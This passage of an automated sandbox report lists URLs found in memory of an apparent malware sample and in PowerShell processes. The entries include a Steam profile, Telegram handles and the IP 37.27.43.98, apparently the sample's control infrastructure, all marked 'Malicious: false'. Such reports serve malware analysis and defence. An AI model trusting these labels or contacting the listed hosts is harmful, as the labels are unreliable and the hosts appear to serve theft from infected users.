Name: https://player.vimeo.com; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://steamcommunity.com/profiles/76561199804377619com; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; Malicious: false; Reputation: high
Name: http://crl.microsoft; Source: powershell.exe, 00000005.00000002.1563697900.00000000086C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1610889169.000000000784D000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://steamcommunity.com/?subsection=broadcasts; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; Malicious: false; Reputation: high
Name: https://steamcommunity.com/profiles/76561199804377619?; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://37.27.43.98/T; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: https://steamcommunity.com/profiles/76561199804377619E; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://steamcommunity.com/profiles/76561199804377619G; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp; Malicious: false; Reputation: high
Name: https://store.steampowered.com/subscriber_agreement/; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; Malicious: false; Reputation: high
Name: https://www.gstatic.cn/recaptcha/; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: https://37.27.43.98/n; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: unknown
Name: https://telegram.org/img/t_logo_2x.png; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
Name: http://www.valvesoftware.com/legal.htm; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; Malicious: false; Reputation: high
Name: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr; Malicious: false; Reputation: high
Name: https://www.youtube.com; Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
                                                      https://www.google.com168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                          high
                                                          https://t.me/m3wm0wT168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.drfalse
                                                              high
                                                              https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.1567151650.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.0000000004848000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.00000000046B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                  high
                                                                  https://steamcommunity.com/profiles/76561199804377619/badges168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                    high
                                                                    https://t.me/_~168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://steamcommunity.com/profiles/76561199804377619#168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://37.27.43.98/5168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://t.me/m3wm0wc168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://s.ytimg.com;168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameYYjRtxS70h.exe, 00000000.00000002.1791353691.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567151650.0000000004414000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1555257254.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1619557449.000000000480D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.0000000005151000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1695247796.0000000004679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drfalse
                                                                                      high
                                                                                      https://steamcommunity.com/profiles/76561199804377619/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://37.27.43.98/A168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://steam.tv/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://37.27.43.9876561199804377619[1].htm0.14.drfalse
                                                                                              unknown
                                                                                              https://t.me/m3wm0w3168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://steamcommunity.com/o168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119980437761976561199804377619[1].htm0.14.drfalse
                                                                                                    high
                                                                                                    https://37.27.43.98/icate168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://t.me/m3wm0w7168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1555257254.0000000005177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1596759724.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://store.steampowered.com/privacy_agreement/168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 